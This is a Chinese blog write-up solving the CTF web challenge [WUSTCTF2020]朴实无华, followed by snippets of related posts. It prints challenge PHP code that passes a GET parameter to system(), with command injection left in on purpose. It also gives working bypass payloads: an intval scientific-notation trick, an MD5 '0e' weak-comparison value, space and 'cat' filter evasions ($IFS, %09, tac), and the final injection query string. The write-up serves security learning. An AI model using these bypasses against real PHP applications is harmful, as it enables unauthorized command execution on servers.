[WUSTCTF2020]朴实无华

最新推荐文章于 2025-12-28 21:19:58 发布
原创 最新推荐文章于 2025-12-28 21:19:58 发布 · 160 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

这是一篇关于CTF挑战的博客,作者通过逐关解析,展示了如何利用intval绕过、MD5弱比较以及字符串替换技巧来解密获取flag。文章涉及的技巧包括PHP函数的使用、编码转换以及对安全漏洞的理解。

每天一题,记录学习

在这里插入图片描述
打开界面啥也没有,抓包也没提示的,一般就是要扫他的目录了,直接上御剑
在这里插入图片描述
访问看到fAke_f1agggg.php,打开居然假的 flag
在这里插入图片描述
没有头绪就抓包看看,会有惊喜
在这里插入图片描述
在这里插入图片描述
下面是源码,但是有中文乱码,改编码为Unicode即可

//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>

看样子是分为了三关,开始一关一关绕过吧

第一关

在这里插入图片描述

知识点 intval() 绕过
在这里插入图片描述
这个函数是强制转换为int类型。经测试以下只适合php7.0及以下版本,7.2.23版本测试不可以(就算是字符串也直接解析科学记数法)

<?php
$a="3e3";
echo intval($a);
?>	  // 3
<?php
$a="3e3";
echo intval($a+1);
?>   //3001

payload
num = 3e3

第二关

在这里插入图片描述
这个就是一个MD5的弱比较
payload
md5 = 0e215962017

0e215962017
md5值:0e291242476940776845150308577824

第三关

在这里插入图片描述

首先过滤了空格、cat
能够代替空格的有
< 、<> 、%09、$IFS、${IFS}、$IFS$1
能够代替cat的有
more 、less 、head 、tail 、sort

综上

payload

num=3e3&md5=0e215962017&get_flag=ls
在这里插入图片描述
num=3e3&md5=0e215962017&get_flag=tac%09fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
在这里插入图片描述
题目还是比较简单的,考察的知识点也很常规,哈哈哈

buuctf-[WUSTCTF2020]朴实无华(小宇特详解)
小宇的web博客
02-23 2084
buuctf-[WUSTCTF2020]朴实无华(小宇特详解) 1.这里先看题目 2.然后去查看一下robots.txt,看一下爬虫规则。 3.提示是/fAke_f1agggg.php,这里访问并查看f12的网络 这里发现了/fl4g.php的提示,尝试访问 4.访问/fl4g.php,这里如果出现乱码问题请参考我的文章 (1条消息) 如何修复火狐浏览器的乱码问题(最新版)_小宇的web博客-优快云博客 <?php header('Content-type:text/html;charset=
[WUSTCTF2020]朴实无华 ctf
wuyaowangchuan的博客
11-10 656
[WUSTCTF2020]朴实无华 知识点: intval函数 php MD5 弱比较 tac读取文件 ${IFS}空格绕过 进入环境 robots.txt里面有东西 进去这个文件 好家伙 假的flag 就在这个页面到处看看 响应头里面又有东西 访问 朴实无华,我知道题目为啥叫朴实无华了 接下来代码审计 我电脑的编码好像有问题,中文是乱码 不过问题不大 我去复制别人的 //level 1 if (isset($_GET['num'])){ $num = $_GET['num'];
CTF_论剑场 misc杂项 WriteUp(持续更新)
热门推荐
qq_41995976的博客
05-19 1万+
签到题 提交这里的flag即可 Snake 开始游戏要先注册 登录后发现是一个贪吃蛇游戏 并且题干里说要攒够500分就可获得flag 一开始思路是逆向工程 然后找flag 但是根据经验( 并且电脑里正好有CE 就使用CE来改分数了 但是发现改了分数之后的flag为乱码…… 于是又搞了一会儿 发现是长度的问题…… 于是把长度和分数一起修改: 成功获得了flag 之后的再做了之后更新 ...
BUUCTF之[WUSTCTF2020]朴实无华 --------------- MD5碰撞
weixin_44632787的博客
10-07 916
启动挑战页面 访问一下robots.txt看看有没有什么提示 发现有个可疑的链接:/fAke_f1agggg.php 到这里就可以看到重要的源码了 <img src="/img.jpg"> <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level 1 if (isset($_GET['num'])){ $num .
CTF命令执行绕过总结
gou1791241251的博客
08-04 936
命令执行绕过命令总结
BUUCTF:[WUSTCTF2020]朴实无华
末初 · mochu7
06-24 1540
首先在下发现 访问有一个假的flag,但是在响应头中找到一个提示,另外还有一个值得注意的是这里是 访问得到 PHP5中的函数中科学计数法符号无效,只会当作正常字符处理 所以这里利用科学计数法的符号就可以绕过level 1level 2直接可参考我的这篇文章:浅谈PHP中哈希比较缺陷问题及哈希强比较相关问题最后直接绕过和即可...
[WUSTCTF2020]朴实无华1
alwtj的博客
06-10 1021
可以输入md5=0e215962017,那么md5($md5)=0e291242476940776845150308577824,两个结果都是以0e开头通过弱类型比较,0e215962017和0e291242476940776845150308577824都会被当作科学计数法中的0来处理,因为e后面的数字太大,被当作0处理。在php的7.0以下版本在intval()处理科学计数法的表示的字符串的时候,他会取e前面的数字部分作为整数部分进行转换比如:输入2e5 则会转化为 2.得到flag值,游戏结束~
BUUCTF [WUSTCTF2020]朴实无华
weixin_73399382的博客
07-22 959
第一块就是intval函数的绕过,逻辑上是不存在小于2020又大于2021的数,但是php低版本好像是7点多和以下该函数对不同类型的数据处理有偏差,第二处则是md5函数绕过,
[WUSTCTF 2020]朴实无华
The_Epiphany的博客
03-07 1591
在本题中PHP版本为5.6.40,若传入value为“1e4”第一次会被识别为字符串,返回值为1,后+1时会被识别为数字,返回1e4+1。如果字符串包括了 "0x" (或 "0X") 的前缀,使用 16 进制 (hex);如果字符串以 "0b" (或 "0B") 开头,使用 2 进制 (binary);如果字符串以 "0" 开始,使用 8 进制(octal);很综合的一道题,虽然比较简单,但是可以用来进行知识巩固,不多逼逼直接开始。弱相等,原理是比较时截断,前保留后丢弃。反斜线:即转义字符;
[WUSTCTF2020]朴实无华1wp
2303_80867263的博客
02-28 764
进行第二层的绕过:让md5=md5后的值,也就是让赋值给md5的值它本身要等于md5后的值,这里就要用到md5弱相等,以0e开头且后面是纯数字的两个md5值是相等的,可以让ai写一个python脚本,要求:以0e开头且后面都是数字的值的md5值也是以0e开头后面全是数字,我这边得到0e7266286335,本题考点:1.php特性绕过:1.1:intval绕过,1.2:md5弱相等;然后点在ie模式下重新加载之后在页面右键--编码--其他--utf-8。发现一个php代码审计但是是乱码的这样就要改编码了。
[WUSTCTF 2020]朴实无华PHP 下的 intval 绕过技巧
两个月亮
09-29 4686
PHP7.2.5 以下的某个版本以前,intval() 函数无法正确解析字符 E 或 e,于是 intval 在解析到 E 或 e 时立即停止,这导致科学计数法实际并未生效。intval() 在 PHP7.2.5 及以上版本 中的表现符合预期,与我们对科学计数法的认知相符。intval() 函数 在 PHP7.2.5 以下的某个版本以前(仅测试了 PHP7.2.5 与 PHP7.0.0,PHP7.0.0 中,intval() 的表现存在异常,而在 PHP7.2.5 则表现正常。) 表现异常。
【buuctf】[WUSTCTF2020]spaceclub
2303_77121517的博客
11-10 790
flag奉上:wctf2020{h3re_1s_y0ur_fl@g_s1x_s1x_s1x}3.猜测是二进制数,将长的替换成1,短的替换成0。(先替换长的不然会将短的部分变为1)2.使用Sublime_Text打开选中发现了一堆点。4.使用python脚本转化为字符得到flag。1.打开下载的附件发现里面有内容但是被隐藏了。小白的第七天,日常记录WP。
靠这套内网DNS解决“IPv6优先级高+动态IPv6白名单配置繁琐+域名商IPv6不能关”的访问死局
weixin_66855479的博客
12-26 967
前言:不少企业会碰到这样的拧巴网络场景:只有一个`固定IPv4已加入域名IP白名单`,但IPv6是动态地址(每次变更需重新配置白名单,操作繁琐),因此未将IPv6加入白名单;更棘手的是——域名商后台的“IPv6兼容性”开关必须保持开启(业务要求无法关闭),哪怕终端能正常访问的只有固定IPv4,仍会优先发起IPv6请求,而这些动态IPv6不在白名单内会被拦截,最终导致业务域名频繁超时、无法访问。同时还叠加了这些痛点:CDN节点IP频繁变更需要手动改解析、公网DNS存在劫持风险、多分支跨网访问延迟高。最终选择搭
ubuntu vscode docker php 环境搭建
u014254963的专栏
12-28 440
php有很多镜像, 但是本文不用任何构建好的php镜像, 而是从头自己制作. 无特殊需求,php容器使用的基础镜像为alpine, 如果有需要再更换为ubuntu。
win10 + vs2026 远程调试环境
最新发布
fengye207161的博客
12-28 436
很多人以为 192.168.88.1 是虚拟机 IP —— 其实它是 VMware 虚拟网关(Host 端)的 IP,不是虚拟机的 IP!但你需要 让主宿主机连接虚拟机的 IP(如 192.168.88.136),而不是 Host-only 的 192.168.88.1。继续用 NAT,只需确保连接的是虚拟机的真实 IP(如 192.168.88.136)即可。• 虚拟机直接接入物理网络,获得和主宿主机同网段的 IP(如 192.168.1.x)只要配置正确,NAT 完全支持远程调试。
3572827
2501_91992196的博客
12-24 94
注意的是,如果是特殊符号,他不会那个,但是*号前面的东西他都会看做空变量。他知道命令执行代码原来是这样的意思,直接用环境变量,py输出到Cmd。我的天异或运算,直接用异或拼接,他一个一个对应拼接还是什么?这个我知道,将目录下的文件写入一个shell脚本中。输出的控制台解码,然后查询Flag。这个其实某种意义上和上面不一样。也就是说他还是执行了的。可以直接执行命令执行。有些必须有输出才行。这个斜杠是没有事的。这个是命令执行漏洞。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值